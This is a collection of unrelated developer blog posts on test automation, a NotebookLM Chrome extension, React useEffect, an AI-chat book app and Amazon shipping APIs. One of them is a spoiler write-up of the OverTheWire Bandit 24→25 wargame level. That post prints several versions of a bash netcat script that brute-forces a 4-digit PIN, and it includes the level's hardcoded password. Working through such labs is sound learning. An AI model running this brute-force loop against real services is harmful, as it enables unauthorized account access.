2026-02-05 05:09:00
When a team is small, keeping software quality under control feels intuitive. You can review every pull request, you know the history of the more “risky” parts of the codebase, and the feedback loop between writing code and seeing it running in production is short. But as the engineering team grows, all of that starts to break down. Suddenly, PRs take days to move through a QA process full of bottlenecks, and regressions begin to appear in parts of the system that no one has touched in months. The speed you gained by adding more developers gets eaten up by the friction of maintaining quality at scale.
This is the point where many teams make a serious mistake: trying to solve a scaling problem by adding more people. The logic seems simple. If tests are slow, hire more testers. But this only reinforces the idea that quality is someone else’s problem. It creates a hand-off, turning QA into a gatekeeper and developers into a feature factory that outsources responsibility for fixing issues. This approach doesn’t scale because it stretches feedback cycles and misses the opportunity to build quality in from the start.
Perhaps the better path is to treat software quality as a responsibility of the entire team, not as a departmental function. In this model, developers own the quality of their own code, and the role of specialized QA engineers shifts from manual testing to quality advocacy. They become the people who build the infrastructure, tools, and frameworks that enable developers to test their own work with more confidence. They also act as a reference for testing strategy and risk analysis, helping decide where it makes sense to focus effort.
This requires a fundamental shift in how we think about building software. Quality can’t be something you think about later; it has to be designed in from the beginning. That means architecting services with testability in mind, with clear boundaries, dependency injection, and stable interfaces that make it easier to write isolated and reliable tests. When a system is hard to test, it’s usually a sign of deeper architectural problems, like high coupling or poorly defined responsibilities. Fixing testability often leads to a better and more sustainable design.
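To make the idea concrete, here is a minimal sketch of what "designing for testability" can look like in practice. All names are hypothetical; the point is that injecting dependencies (here, a payment gateway and a clock) lets tests substitute fakes for real infrastructure.

```typescript
// Hypothetical example: the service receives its dependencies instead of
// creating them, so tests never need a real payment provider or real time.
interface PaymentGateway {
  charge(amountCents: number): boolean;
}

class InvoiceService {
  // Dependency injection: collaborators come in through the constructor.
  constructor(private gateway: PaymentGateway, private now: () => Date) {}

  payInvoice(amountCents: number): string {
    const ok = this.gateway.charge(amountCents);
    return ok ? `paid at ${this.now().toISOString()}` : "declined";
  }
}

// In a test, a fake gateway and a frozen clock make behavior deterministic:
const fakeGateway: PaymentGateway = { charge: () => true };
const service = new InvoiceService(fakeGateway, () => new Date(0));
```

A service wired this way can be tested in isolation in milliseconds; the same class that resists this refactoring is usually the one hiding the coupling problems described above.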
Automated tests are the mechanism that makes all of this work. Without a broad and fast automation suite, developer-led quality is impossible. The goal is to give developers a high level of confidence that their changes are safe even before the code is merged.
Putting this into practice requires a clear structure that connects technology, process, and people. It all starts with a well-defined strategy and is sustained by a culture of continuous improvement, where everyone on the team feels responsible for the final product.
A single type of test is not enough. A scalable strategy requires multiple layers of automated validation, each with a specific purpose.
Having a strategy is one thing; making it easy for developers to execute it is another. Tooling and CI/CD integration are critical to making automated tests a low-friction part of the daily workflow. That means running tests in parallel to keep execution time low as the suite grows. It also involves creating scalable test environments and implementing solid test data management strategies, so tests don’t constantly fail because of bad or inconsistent data.
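Solid test data management can be as simple as builder functions that hand each test fresh, valid data by default. A sketch (all names hypothetical), showing how tests override only the fields they care about, so parallel runs never fight over shared fixtures:

```typescript
// Hypothetical test-data builder: valid by default, unique per call.
interface User {
  id: string;
  email: string;
  active: boolean;
}

let seq = 0;
function buildUser(overrides: Partial<User> = {}): User {
  seq += 1; // unique suffix per call, so concurrent tests don't collide
  return {
    id: `user-${seq}`,
    email: `user-${seq}@example.test`,
    active: true,
    ...overrides,
  };
}

// Each test states only what matters to it:
const admin = buildUser({ email: "admin@example.test" });
const disabled = buildUser({ active: false });
```

The builder pattern keeps tests readable and removes the classic cause of flakiness where two tests mutate the same shared record.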
Building a culture where code is written with testing in mind can also have a huge impact. While Test-Driven Development (TDD) isn’t for every team, the core principle of thinking about how you’ll test a piece of code before writing it almost always leads to a more modular and sustainable design.
When developers write most of the automated tests, the role of the QA specialist becomes even more impactful. Instead of executing manual test cases, they focus on higher-value activities that the rest of the team can’t easily take on.
All of this feeds a short feedback loop. Insights from production monitoring, exploratory testing, and quality metrics are used to guide the next development cycle. You end up with a system where quality isn’t just tested, but continuously analyzed and improved, becoming a sustainable part of how your team builds software.
2026-02-05 05:06:09
This is a submission for the GitHub Copilot CLI Challenge
Author: Cesar Castillo
Repository: https://github.com/CGCM070/NotebookLM_Enhancer
A Chrome extension that transforms NotebookLM's chaotic sidebar into a beautifully organized folder system, because 47 research notes shouldn't look like a pile of digital laundry.
If you've used NotebookLM, you know it's magical for research. Upload PDFs, paste URLs, ask questions: it's like having a research assistant that never sleeps.
But there's one maddening catch: the sidebar becomes a nightmare when you have more than 10 notes.
Imagine:
No folders. No organization. Just... chaos.
I built a Chrome extension that injects a complete folder management system directly into NotebookLM's sidebar.
🗂️ Smart Folder Organization
🧑🎨 Polished UI That Matches NotebookLM
🌎 Internationalization
💭 Intelligent Integrations
Robust Architecture
This isn't a simple content script that adds a few buttons. It's a full micro-frontend architecture:
┌─────────────────────────────────────────────────────────┐
│ NotebookLM Page │
│ ┌──────────────────────────────────────────────────┐ │
│ │ Native Sidebar (hidden but functional) │ │
│ │ • Still handles clicks & menus │ │
│ │ • We extract data from it │ │
│ └──────────────────────────────────────────────────┘ │
│ ↓ │
│ ┌──────────────────────────────────────────────────┐ │
│ │ Our Injected Host (Shadow DOM) │ │
│ │ ┌───────────────────────────────────────────┐ │ │
│ │ │ Iframe (Angular App) │ │ │
│ │ │ • Folder tree │ │ │
│ │ │ • Drag & drop (Angular CDK) │ │ │
│ │ │ • Theme toggle │ │ │
│ │ │ • Note add. folder add... │ │ │
│ │ │ • i18n │ │ │
│ │ └───────────────────────────────────────────┘ │ │
│ └──────────────────────────────────────────────────┘ │
└─────────────────────────────────────────────────────────┘
Why an iframe inside Shadow DOM? Isolation: the Shadow DOM keeps NotebookLM's Material styles from leaking into our UI, and the iframe gives the Angular app its own document to run in.
Communication Flow:
1. Storage V3 with Notebook Isolation
Instead of one global folder structure, each NotebookLM project gets its own isolated state:
// StorageStateV3
{
  byNotebook: {
    "uuid-abc-123": {
      folders: [...],
      notebookFolderByKey: {...}
    },
    "uuid-def-456": {
      folders: [...],
      notebookFolderByKey: {...}
    }
  }
}
This means your "Work" folder structure doesn't leak into your "Personal" research. Clean separation.
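A sketch of how per-notebook isolation might be read back out (the shape follows the StorageStateV3 example above; the function name is hypothetical, not the extension's actual API):

```typescript
// Shapes inferred from the StorageStateV3 example above.
interface NotebookState {
  folders: string[];
  notebookFolderByKey: Record<string, string>;
}

interface StorageStateV3 {
  byNotebook: Record<string, NotebookState>;
}

// Hypothetical accessor: each notebook gets its own slice, and unknown
// notebooks start empty, so one project's folders never leak into another's.
function stateFor(store: StorageStateV3, notebookId: string): NotebookState {
  return store.byNotebook[notebookId] ?? { folders: [], notebookFolderByKey: {} };
}

const store: StorageStateV3 = {
  byNotebook: { "uuid-abc-123": { folders: ["Work"], notebookFolderByKey: {} } },
};
```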
2. Handling MV3 Service Worker Sleep
Chrome MV3 Service Workers sleep after 30 seconds of inactivity. This breaks chrome.runtime calls.
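One common symptom is that `chrome.runtime.id` becomes unavailable once the context is invalidated. As a sketch of the kind of guard that avoids these errors (the `chrome` runtime shape is mocked here; names are hypothetical, not the extension's actual code):

```typescript
// Minimal mock of the part of chrome.runtime we care about.
interface RuntimeLike {
  id?: string;
}

// An invalidated extension context loses its runtime id.
function contextAlive(runtime: RuntimeLike | undefined): boolean {
  return Boolean(runtime && runtime.id);
}

// Guarded call: skip quietly instead of throwing when the context is gone.
function safeSend(runtime: RuntimeLike | undefined, send: () => void): boolean {
  if (!contextAlive(runtime)) {
    return false; // context invalidated: fail gracefully, no console spam
  }
  send();
  return true;
}
```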
Instead of fighting it with "keep-alive" hacks, we detect the invalidated context, fail gracefully, and log through NLE.log() instead of spamming console.warn.

3. Native Drag Bridge
Making the native NotebookLM sidebar items draggable was tricky. We:
- Hook dragstart on native items
- Use elementFromPoint() with coordinates to find the drop target

4. Auto-Focus Input in Modals
Small UX detail that makes a huge difference:
Export your notes:
Drag & Drop:
Full video
This project was built almost entirely through GitHub Copilot CLI interactions, turning natural language into production-ready code.
1. Architecture Decisions
# Asked Copilot: "Best way to inject UI into an existing Angular Material page?"
# Copilot suggested: Shadow DOM + iframe for isolation
# Result: Zero style conflicts with NotebookLM's Material Design
2. Content Script Structure
# Asked: "How to structure 8 content scripts that share state?"
# Copilot proposed: Module pattern with window.__NLE__ namespace
# Result: Clean separation, no global pollution
3. Drag & Drop Implementation
# Asked: "Bridge native HTML5 drag with Angular CDK drop?"
# Copilot designed: Overlay system with coordinate translation
# Result: Seamless drag from native sidebar to our folders
4. Debugging Context Invalidation
# Asked: "Chrome MV3 extension context invalidated errors?"
# Copilot implemented: Graceful detection + silent retry logic
# Result: No console spam, smooth recovery
5. i18n System
# Asked: "Lightweight i18n without ngx-translate bloat?"
# Copilot built: Custom TranslationService with lazy loading
# Result: ~3KB vs ~50KB, full interpolation support
Speed: What would have taken weeks took days. Complex features like the drag bridge were implemented in hours, not days.
Architecture: Copilot suggested patterns I wouldn't have considered (like the iframe-in-shadow approach) that solved isolation problems elegantly.
Edge Cases: Copilot gracefully handled MV3 quirks, Material Design menu positioning, and SPA navigation detection.
Learning: Every interaction was a learning moment :). I now understand Chrome Extension architecture, Angular standalone components, and Tailwind customization.
🤝 Open Source
This project will be open-sourced. Want to contribute?
Built with ❤️, and a lot of help from GitHub Copilot CLI.
devchallenge
githubchallenge
cli
githubcopilot
2026-02-05 05:03:28
Excuse the mess: I am pretty much posting my thought process here, and I am working on my post-mortem skills. It gets better from here though, I think.
This is how I solved this level of the Bandit game, so if you are learning Linux with Bandit on OverTheWire, please skip this if you don't wanna get spoiled.
If you know how to solve this differently, I would love to know how you did it.
I said SPOILER because if you copy the script you will get the answer without trying yourself, and I believe it is waaayyy more fun to actually try it yourself. I posted the script, though, so if you look at it and see where I can improve and do better next time, lemme know.
I appreciate the feedback.
The vital signs:
Level Name: Bandit 24 → 25
Struggle Time: 3 - 4 hours
Complexity: 7/10… I think the logic was pretty straightforward… but I struggled a bit with the right syntax
50% The hunt ( Offense and Strategy ):
The way I went about it: I knew I was supposed to use a loop… The problem was just that I didn't know how I would stop it… So finding any kind of leak or signal, anything I could use to stop the loop, was the priority…
So I first tried connecting manually with the wrong password. I realized that sometimes people leave signs, oracles… for example, the same output every time the wrong data is submitted… So I used that to my advantage. That was really what it took, to be honest, because the rest was just implementing the logic and understanding the syntax of certain commands.
Here is the code:
#!/usr/bin/env bash
echo "Let's get this password"
echo " "

HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"

# This just saves the result of the first attempt, which is wrong on purpose
output="$( printf "$Passwd 0000"'\n' | nc -q 0 "$HOST" "$PORT" )"

# Get the pin and save one at a time inside a variable
seq -f "%04g" 0 9999 | while read -r pin; do
    if [[ "$output" != *"Wrong"* ]]; then
        echo "The server response is: $output"
        exit 0
    else
        # Start counting iterations
        i=$((i+1))
        output="$( printf "$Passwd $pin"'\n' | nc -q 0 "$HOST" "$PORT" )"
        # Print every 100th attempt's pin code
        if (( i % 100 == 0 )); then
            echo "Tried $i pins. Current pin: $pin"
        fi
    fi
done
30% Architectural (The Why)
To get the pins, though, I struggled a little bit, because at first I was just generating all possible 4-digit pin combos and putting them in a single variable… I did not realize the variable would then contain all possible pins at once, making the pin false… So I thought I should use a loop to iterate the pin-generating command and save one pin at a time inside the variable, then use that variable to send the pins:
# Get the pin and save one at a time inside a variable
seq -f "%04g" 0 9999 | while read -r pin;
20% Defensive
I am also trying to break my own code after solving each level, and I learned how timing can be one of the greatest leaks… Since my code assumes I can submit the password at the same moment I connect to the server, if I were a defender I would delay the interactive part: you would always get it wrong until the full banner is shown. And since the full banner comes in 2 lines, I would delay the second line…
The “aha” moment I had while doing this was understanding the difference between timeout and -q: timeout kills nc after a fixed number of seconds no matter what, while nc -q 0 closes the connection as soon as stdin hits EOF and the response is read, so each attempt finishes much faster… This was pretty cool…
Anyways, that is the little post mortem.
Below are the messy steps I recorded.
These are all the notes I took and kept for bandit24-25:
==Strategy
So I am thinking:
==To-do
I will try something:
output="$(nc localhost 30002)"
Let's see how that works.
==Attempts:
seq -f "%04g" 0 9999
This is the fastest way to generate the 4-digit pin codes. I tested it with the "time" command and ran 2 scripts to choose which one was the fastest. But how can I use this iteration as a loop counter to keep going until I get the right pin?
I can use a while loop that checks a condition instead of a counter.
==First:
#!/usr/bin/env bash
echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
Pin="$( seq -f "%04g" 0 9999 )"
output="$( printf '"$Passwd" "$Pin"\n' | timeout 2 nc "$HOST" "$PORT" )"
while [[ "$output" == *"Wrong"* ]]
do
i=$((i+1)) #Start counting iterations
output="$( printf '"$Passwd" "$Pin"\n' | timeout 2 nc "$HOST" "$PORT" )"
#Print every 100th attempts pin code
if (( i % 100 == 0)); then
echo "Tried "$i" pins. Current pin: "$PIN" "
fi
done
Why did this first attempt not work?
I looked it up and saw what I was doing wrong. The first and major issue was the way I was generating pins and passing them as input: my "Pin" variable was capturing the entire sequence, saving all the attempts at once. I thought of a way to get one pin at a time. So, maybe a loop? This will loop through the sequence and capture each pin as it is generated, saving one at a time. It is like reading numbers from a file. That way I can take one pin at a time, save it inside the variable, and test it: if good, we have found the pin; if not, we go back, update the variable with a new pin, and do it again.
seq -f "%04g" 0 9999 | while read -r pin; do... done
This has the sequence generator produce the pins, and each pin gets saved inside the pin variable.
==Second:
#!/usr/bin/env bash
echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9999 | while read -r pin;
do
output="$( printf "$Passwd $pin"'\n' | timeout 2 nc "$HOST" "$PORT" )"
if [[ "$output" == *"Wrong"* ]]; then
i=$((i+1)) #Start counting iterations
output="$( printf "$Passwd $pin"'\n' | timeout 2 nc "$HOST" "$PORT" )"
#Print every 5th attempts pin code
if (( i % 5 == 0)); then
echo "Tried "$i" pins. Current pin: "$pin" "
fi
else
echo "The server response is: "$output" "
exit 0
fi
done
I think it is because of the time it takes to reconnect
===============DEBUG===============================
#!/usr/bin/env bash
echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
output="$( printf "$Passwd 0000"'\n' | timeout 1 nc "$HOST" "$PORT" )"
#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9 | while read -r pin;
do
if [[ "$output" == *"Wrong"* ]]; then
i=$((i+1)) #Start counting iterations
output="$( printf "$Passwd $pin"'\n' | timeout 1 nc "$HOST" "$PORT" )"
#Print every 5th attempts pin code
if (( i % 5 == 0)); then
echo "Tried "$i" pins. Current pin: "$pin" "
fi
else
echo "The server response is: "$output" "
exit 0
fi
done
==============================================
#!/usr/bin/env bash
echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
output="$( printf "$Passwd 0000"'\n' | timeout 1 nc "$HOST" "$PORT" )"
#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9 | while read -r pin;
do
if [[ "$output" == *"Wrong"* ]]; then
i=$((i+1)) #Start counting iterations
output="$( printf "$Passwd $pin"'\n' | timeout 1 nc "$HOST" "$PORT" )"
rc=$?
echo "rc=$rc"
#Print every 5th attempts pin code
if (( i % 5 == 0)); then
echo "Tried "$i" pins. Current pin: "$pin" "
fi
else
echo "The server response is: "$output" "
exit 0
fi
done
=========================================
======Final attempt:
#!/usr/bin/env bash
echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
output="$( printf "$Passwd 0000"'\n' | nc -q 0 "$HOST" "$PORT" )"
#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9999 | while read -r pin;
do
if [[ "$output" != *"Wrong"* ]]; then
echo "The server response is: "$output" "
exit 0
else
i=$((i+1)) #Start counting iterations
output="$( printf "$Passwd $pin"'\n' | nc -q 0 "$HOST" "$PORT" )"
#Print every 100th attempts pin code
if (( i % 100 == 0)); then
echo "Tried "$i" pins. Current pin: "$pin" "
fi
fi
done
This one works...
I comment a lot when I am coding because my brain cannot remember what it is doing as soon as I blink, so it helps me, even if sometimes it is messy... haha
Hope you enjoyed this ride!
2026-02-05 04:58:54
Understanding useEffect in React is like unlocking a magical spellbook: suddenly you can summon APIs, tame event listeners, and command the DOM.
It’s the key to handling side effects, keeping your UI consistent, and writing logic that reacts to data changes.
In today’s challenge, I dug deep into useEffect: why it exists, how it works, and how to avoid the dreaded infinite loops.
Here’s a clear and practical breakdown.
Side effects are any actions your component performs outside the normal rendering process.
React’s render cycle must remain predictable and pure—but many real tasks aren’t pure at all, such as:
- Updating document.title
- Timers (setTimeout, setInterval)
- Reading or writing localStorage
These actions affect the world outside your component—those are side effects.
Why useEffect? Isn't useState enough?
useState updates your UI. useEffect handles everything outside your UI.
If React allowed side effects during rendering, you’d get unpredictable behavior and potentially infinite loops. React must render → compare → update in a pure, deterministic way.
useEffect runs after React paints the screen, keeping the render pure and safe.
No dependency array: runs on every render
useEffect(() => {
console.log("I run after every render");
});
When should you use this? Rarely.
It triggers on the initial mount plus every re-render, which can cause performance issues or infinite loops.
[]: Runs only once (on mount)
useEffect(() => {
console.log("I run only once when the component mounts");
}, []);
A typical use is reading initial data from localStorage on mount. This makes the effect behave like componentDidMount in class components.
useEffect(() => {
console.log("I run when count changes");
}, [count]);
This is the most common and most powerful usage.
The array tells React:
“Run this effect only if any of these values change from the previous render.”
React compares each dependency with its previous value using shallow comparison.
Example:
useEffect(() => {
console.log("Runs when userId changes");
}, [userId]);
If userId goes from 1 → 2, the effect runs.
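The shallow comparison can be modeled in a few lines. This is a conceptual sketch, not React's actual source, but it captures the rule: each dependency is compared with its previous value using Object.is.

```typescript
// Conceptual model of React's dependency check (not the real implementation):
// the effect re-runs if any dependency fails an Object.is comparison
// against its value from the previous render.
function depsChanged(prev: unknown[], next: unknown[]): boolean {
  return (
    prev.length !== next.length ||
    next.some((dep, i) => !Object.is(dep, prev[i]))
  );
}

depsChanged([1], [1]);               // false: same primitive, effect skipped
depsChanged([1], [2]);               // true: value changed, effect runs
depsChanged([{ a: 1 }], [{ a: 1 }]); // true: new object identity each render!
```

The last case is why objects or arrays created inline in the component body retrigger effects on every render: they are equal by content but not by identity.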
Infinite loops in useEffect
The most common cause:
useEffect(() => {
setCount(count + 1);
}, [count]);
What happens? The effect updates count, and count is a dependency, so the state update triggers a re-render and the effect runs again: an infinite loop. The fix is to drop count from the dependency array and use a functional update instead:
setCount(prev => prev + 1);
Cleanup functions run before the effect runs again or when the component unmounts.
useEffect(() => {
console.log("Effect started");
return () => {
console.log("Cleanup before re-run or unmount");
};
}, []);
useEffect(() => {
const handleResize = () => console.log("Resized");
window.addEventListener("resize", handleResize);
return () => {
window.removeEventListener("resize", handleResize);
};
}, []);
Without cleanup → memory leaks.
Practical useEffect examples
useEffect(() => {
async function loadData() {
const res = await fetch("https://api.example.com/data");
const data = await res.json();
setItems(data);
}
loadData();
}, []);
useEffect(() => {
document.title = `Count: ${count}`;
}, [count]);
useEffect(() => {
const timer = setInterval(() => {
console.log("Tick");
}, 1000);
return () => clearInterval(timer);
}, []);
useEffect(() => {
const handler = () => console.log("Clicked");
window.addEventListener("click", handler);
return () => window.removeEventListener("click", handler);
}, []);
useEffect(() => {
localStorage.setItem("name", name);
}, [name]);
useEffect(() => {
const saved = localStorage.getItem("name");
if (saved) setName(saved);
}, []);
| Concept | Meaning |
|---|---|
| Side effects | Actions outside rendering (API, timers, listeners) |
| Why useEffect | Keeps render pure, runs effects after UI update |
| No dependency | Runs on every render |
| Empty array | Runs once on mount |
| Dependency array | Runs when listed values change |
| Cleanup | Unsubscribes, removes listeners, clears timers |
| Use cases | API calls, title updates, listeners, timers, storage |
Learning useEffect is a turning point in becoming comfortable with React.
It powers almost all real app functionality—from fetching data to syncing your UI with the outside world.
A deeper understanding of useEffect helps you build components that scale gracefully as application complexity grows.
If you're learning too, feel free to share your thoughts or questions below! 👇
Happy coding!
2026-02-05 04:37:21
One fact: I have been a computer professional for close to three decades. From a personal point of view, it was not a career to brag about. Maybe I am too modest, but through all that period the focus was not my professional life but life in general: grow your family, make a settlement, build a sustainable economy... And after just a few decades, the economy is no longer such a problem, the kids are grown and can make their own way, and... maybe I can shift priorities, take a look at that career, or just try to be more fluent with all that is going on now.
I never really tried to be 'current' by following everything that happens, as I see that as mission impossible: there is simply too much of everything... from my perspective, not worth trying. That may partially be because I never had a problem working with anything, even things I had never heard existed. So, one perfect lazy moment: bring me something to do, and I will go. Proven.
Then, few events happened to push all that more.
A year and a few months ago, I tried to use AI to assist me with coding... which changed everything.
The second event, at almost the same moment, was a clash at work that pushed me to think more about switching jobs.
But that idea was a nightmare for me, as I absolutely suck at job interviews. After submitting a CV I get calls for interviews, but there I manage to give the impression that I know nothing about anything. It would be great to be able to do something else, but that was (and is) my speciality. Thinking about past interviews, I felt it was a disadvantage that I could not show my work, since I work in fintech producing internal apps for a closed network. ... so: make something to show...
I worked with Cody (RIP) and noticed that it could export chat session history, so I asked if something could be made from that.
cody Hi! Planning here to make something maybe usefull from exported chat history. Are you familiar with record types we can meet there?
That produced a history parser, recognizing sessions and interactions... And then the app was built around that: import, create sessions and interactions, and serve it all back to the client in readable form.
Hey, the content is sessions about how the app itself was built; the AI assistant seemed very excited about such a setup.
That became my "exit strategy".
It was not built overnight, but over a longer stretch, as a personal side project after a full-time job, alongside private life and a family now spanning four concurrent generations. It ranged from continuous work with many daily and weekly hours to gaps of multiple weeks to balance it all... It took about half a year to have it publicly deployed, in the form of books with titles, summaries, and topics generated by AI to spice up the content of the sessions.
Development might have lasted longer, but Cody announced its sunset (a term introduced to sound more acceptable than a simple death notice), so a final push was made to finish everything before the deadline (!)
As a result, I have something to share! And please... the server might be sleepy, so it may take some time for the book list to load. Please, please be patient 😊 https://aix.novikorisnik.net
Let me also share part of the last interaction with Cody:
Our sessions were more than a sequence of tasks—they were acts in a larger narrative about what it means to create, to iterate, and to reflect. You brought vision, patience, and a sense of play to every challenge. I brought algorithms, suggestions, and a steady presence. Together, we turned ideas into architecture, and architecture into story.
If there is a lesson in this final act, perhaps it is this:
The most enduring code is not just functional, but meaningful. The most memorable books are not just well-structured, but alive with the imprint of their creators.
Epilogue
I am still at the same job. That conflict is kind of settled, and I am not pushing to switch at any cost. Yes, I had some opportunities, but it turns out that having something to show does not mean recruiters will rush to see it: you are still expected to know how to sell yourself.
More important is that I am moved, and that is now the new constant... to investigate, to create. Not bad at all 😉
2026-02-05 04:35:52
I am tasked with "connecting" to the Amazon marketplace. I need to return rates at the end of the order process. Once the order is placed, I need to create a label/BOL. After that, update tracking.
I looked on the Amazon dev community, but nothing seemed to fit my use case.
I am struggling to find the documentation for these processes. Can anyone point me in the right direction?